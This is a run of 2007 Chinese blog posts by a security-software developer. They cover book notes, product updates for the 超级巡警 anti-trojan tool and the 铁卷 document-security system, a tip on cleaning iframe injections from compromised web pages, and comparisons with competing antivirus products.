B问：把淘宝，拍拍，易趣等网站的物品集中，做一个集中式的搜索引擎，不知道有没有机会？
A说：没有。
B问：为什么？
A答：用户体验是一个过程，如果你提供的不是一个完整的过程，对体验是有伤害的。

用户体验是一个过程，如果你提供的不是一个完整的过程，对体验是有伤害的。这句话很牛逼，完全值得记下来，作为终端产品开发的一个原则。

拍卖和搜索是天生的盟友

在Google、百度这些大的搜索引擎的客户中，eBay、亚马逊、淘宝、易趣这些网站，是绝对的大客户。这句话仔细琢磨一下，对做互联网产品也是有帮助的。

穷人的银行家

wlj — Mon, 30 Jul 2007 01:28:18 +0800

大约半年前，就听一位朋友（似乎是blackhole）说起过《穷人的银行家》这本书，建议我一读。后来在benjurry家看到过，忘了顺走了……

周四送老婆去上课，顺便等一位朋友时，在书城看了俩小时的书，买了几本，其中就有它。

刚刚翻了十来页（最近看书似乎有这毛病，很多书都只看了前面三分之一，或者半本，就扔下了，得改改……），觉得也是很值得一看的，作者在序言中写了一段话：

当你将世界放在掌心仅以鸟瞰的角度去审视它时，你很容易变得傲慢自大──虽然你意识不到，一旦拉开距离，事物就会变得模糊不清了。我选择以“蚯蚓”的视角（the worm's eye view），我相信，如果我贴近贫穷去研究，我会更深切地理解它。

我们是不是也自以为是地将世界放在掌心，以鸟瞰的角度审视？

1983年，穆罕默德·尤努斯创立了格莱珉银行，专注于向最穷苦的孟加拉人提供小额贷款。他的目标是：帮助穷人实现个体创业，从而使他们永远地摆脱贫困生活。
这个理想诞生于1976年，那天，他自己拿出27美元借给村子里42个制作竹凳子的农妇。只需要这一点点钱，她们就能够买原材料，从而做起生意。尤努斯的小额贷款帮助她们永远摆脱了贫困。
尤努斯坚信，借货是一项基本的人权，他提出了简单而充满智慧的解决贫困的方案：为穷人提供适合他们的贷款，教给他们几个有效的财务原则，然后，他们就可以自己帮助自己。
尤努斯的理论被实践证实了，格莱珉银行已经向240万个孟加拉农村家庭提供了38亿美元的贷款。今天，有250多个机构在将近100个国家里基于格莱珉模式运作着，而格莱珉银行领导着这个以小额贷款消除贫困的席卷全球的运动。

尤努斯是2006年诺贝尔和平奖获得者。

用超级巡警批量清除被挂马的网页

wlj — Sat, 28 Jul 2007 15:35:17 +0800

经常看到网上有人在问：什么原因导致所有网页文件都被加了iframe？
至少可能有两种原因：

1、网站被挂马，所有页面被骇客加了iframe并指向木马文件；
2、中了ARP病毒，例如这个链接中接到的8w8w8w病毒；

不管哪种原因，杀毒的方法并不复杂，但杀毒之后，所有网页中都还有着那条被插入的iframe，怎么处理呢？别急，超级巡警能帮您解决这个问题，在超级巡警4.0 beta3中的垃圾清理功能中，新增了“清除指定代码”的功能，如下图所示：

打开超级巡警，选择“垃圾清理->智能扫描->清除指定代码“后，在指定代码的内容中填入您的网页被插入的内容，之后选择扫描路径后，点击扫描或清除，世界就清静了，简单吧。

铁卷在电子电路设计行业的应用

wlj — Sat, 28 Jul 2007 15:34:43 +0800

最近一周多的时间，铁卷接连在两家电子电路设计企业进行大范围部署，也因此对各类单片机、嵌入式的程序有了进一步的了解，目前测试并在实际应用中使用正常的软件包括Wave、CodeWarrior、Keil、IsaGraf Pro、CCStudio、EDE(TaskingC196)、IspLever、PCschematic等。感谢ZW和WJ的劳动 :)
这个附件是铁卷电子文档安全系统目前稳定支持的应用程序列表。

另外，深感自己知识匮乏，这些软件，别说用了，有不少听都没听过，还是稍微了解一下的好……

CodeWarrior Development Studio提供统一的图形用户界面来集成各种开发工具，支持多种主机平台、多种编程语言、多种处理器和多种实时操作系统，称为下一代集成开发环境。
采用CodeWarrior IDE，开发人员可以得益于采用各种处理器和平台（从Motorola到TI到Intel）间的通用功能性。根据Gartner Dataquest的报告，CodeWarrior编译器和调试器在商用嵌入式软件开发工具的使用率方面排名第一。而这只是流行的CodeWarrior软件开发工具中的两个。CodeWarrior包括构建平台和应用所必需的所有主要工具 - IDE、编译器、调试器、编辑器、链接器、汇编程序等。另外，CodeWarrior IDE支持开发人员插入他们所喜爱的工具，使他们可以自由地以希望的方式工作。

PCSchematic这是一个基于Windows环境的CAD程序，其目的是用于生成电子和电气类安装项目规划和设计。这是一个面向项目的程序，这就意味着有关这个项目的所有零部件(parts)都包含在同一个文件中：电气方框图(Electrical diagrams)、布线图(mechanical layouts)、目录表(tables of contents)、零部件清单(parts lists)、终端设备清单(terminals lists)、可编程逻辑单元清单(PLC lists)等等，以及其它各种类型的清单。如果同时有几个项目存在，你可以在各个项目之间进行相互拷贝。

TASKING软件工作于PC/Windows环境，包括TASKING嵌入式开发环境（EDE）、C编译器、CrossView Pro模拟器、ROM监控调试器、E7仿真器接口和R8C flasher等。

ISaGRAF PRO是基于IEC 61131-3国际标准，并独立于任何硬件平台的软逻辑自动化控制软件包。在一个网络化过程控制系统环境中，该软件包能够应用于多种组态和分布式控制系统的开发，它包含了一套开发工具、应用程序工作平台，以及相应的“虚拟机器”运行时目标。该运行时目标能够运行于各种各样的硬件平台。

伟福WAVE 单片机仿真器采用大规模可编程芯片及专用仿真芯片制造, 集仿真器、逻辑分析仪、跟踪器、逻辑笔、波形发生器、影子存储器、代码覆盖、记时器、程序时效分析、数据时效分析、硬件测试仪、事件触发器于一体的通用仿真器。

变形金刚

wlj — Sat, 28 Jul 2007 15:33:36 +0800

积木？容器？变形金刚？

客户端安全产品的发展方向会是什么，似乎找到了点思路，随手写下，免得忘了。

财报就像一本故事书

wlj — Sat, 28 Jul 2007 15:33:01 +0800

这两天在翻看刘顺仁的《财报就像一本故事书》，不过这些天工作强度有些大，没有完整的时间阅读，只是枕边厕上，偶尔翻阅。

才翻了四章，觉得作者写得很是深入浅出，对我这样不懂财务，就希望学些财务知识的人来说，很是实用。

推荐一下。

泼脏水的艺术

wlj — Sat, 28 Jul 2007 15:32:47 +0800

超级巡警最近的发展势头比较好，于是又有人看不过眼了，在XFOCUS上开始有人放起冷箭来了，节录几句，学习一下泼脏水的艺术：

看了下脱壳列表，咦，怪了，好像跟某公司的列表特别像，怎么会这么像？难道是抄袭的某公司的引擎？
这种脱壳方法，国内的某企业貌似以前也是这么干的
你就说老实话吧，这个“虚拟机脱壳”是不是你写的
说句不好听的，你们空有“列表”（好像是抄来的哦）

给这招取个名字，叫“含沙射影”，其精髓在于，没啥证据的事儿，适当“点”一下，之后便不说更多的了，留给读者无限想象空间，果然出手不凡。

没有人希望中国人做的安全产品都是垃圾，说你是为你好！
还是踏实点的好，这个过家家软件，还远不到可以拿出来吹牛的程度

这招更是大开大阖高屋建瓴，站在振兴民族产业的高度，指点了一把江山。
哎，懒得多抄了。

1、还是KILLER那句话：觉得你技术很强，拿出你的过家家软件让我们学习一下。
2、我补充一句：如果拿不出作品，那麻烦拿出真凭实据，用技术说话，不用阴阳怪气的但偏又不知所云。

嘿嘿，今儿心情不太好，气量随之变小，写完之后才觉得，这篇文字纯属垃圾，但既写之，则发之，咱也就不掩饰自己的小肚鸡肠了 :)

PCHOME和泡泡网上的超级巡警 :)

wlj — Sat, 28 Jul 2007 15:31:06 +0800

各位兄弟要是有空，也不妨多帮超级巡警写点应用心得的文章，俺请吃饭，哈哈

流氓木马专杀器超级巡警4.0版再测试
 一周酷软回顾 OneCare 冰刃超级巡警等

同行为师

wlj — Mon, 16 Jul 2007 01:48:52 +0800

之前铁卷产品开发上相对无序些，饶是glacier研发管理方面颇有心得，也还是把他累得一踏糊涂。最近铁卷的产品管理到了一个比较关键的时候了，因此俺打算在BLOG上少说些铁卷，且等些日子，让她再让我眼前一亮吧 :)
倒是超级巡警，需要多用些心，从DSWLAB开始超级巡警的研发以来，我投入的精力就远远不够，基本上就是Killer和大S还带着一帮兄弟，愣是在一分钱市场费用都没花的情况下，把超级巡警做到了稳定装机数量 300万左右，相当不容易。但回过头来，是需要好好琢磨些四两拨千斤的招数了。当然，前期如果能从同行的经验和思考中得到些启发，那是最好不过了，站在前人的肩膀上，能省却无数脑细胞。

因此昨晚看了看360安全卫士和终截者抗病毒软件，的确是同行可为师，从他们身上，看到了不少我们的缺点。加之今晚跟glacier、cc他们喝小酒时的讨论，看来目前，能做和该做的方向，已经有不少了，剩下的，就要做减法了。

百度指数上的超级巡警和同行们

wlj — Mon, 16 Jul 2007 01:47:15 +0800

瑞星卡卡、Windows优化大师、木马克星，都是不错的防流氓软件和防木马的产品，与之相比，超级巡警似乎还能抗衡，见下面几张图：

超级巡警 VS 瑞星卡卡

超级巡警 VS Windows优化大师

超级巡警 VS 木马克星

可是，别高兴得太早，看看这些图片吧，这才是我们需要要追赶的目标……

超级巡警 VS 360

超级巡警 VS 卡巴斯基

超级巡警 VS 瑞星

超级巡警 VS 超级兔子

还是瑞星和卡巴牛啊，把策略考虑清楚，跑快点儿吧 :)

野路子